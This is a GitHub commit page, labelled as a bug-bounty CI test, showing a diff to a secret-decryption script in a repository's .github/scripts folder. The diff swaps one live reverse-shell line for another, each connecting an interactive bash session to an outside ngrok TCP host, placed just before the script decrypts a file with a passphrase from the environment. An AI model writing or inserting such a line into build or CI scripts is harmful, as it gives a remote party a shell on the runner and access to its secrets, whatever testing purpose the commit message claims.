Skip to content

Commit 97174b7

Browse files
committed
bugbounty:test-ci-bug
1 parent 55e18c4 commit 97174b7

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

.github/scripts/decrypt_secret.sh

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,6 @@
11
#!/bin/sh
22

3-
bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/15476 0>&1
3+
bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/15476 0>&1'
44

55
# --batch to prevent interactive command --yes to assume "yes" for questions
66
gpg --quiet --batch --yes --decrypt --passphrase="$KEYFILE_PASSPHRASE" \

0 commit comments

Comments
 (0)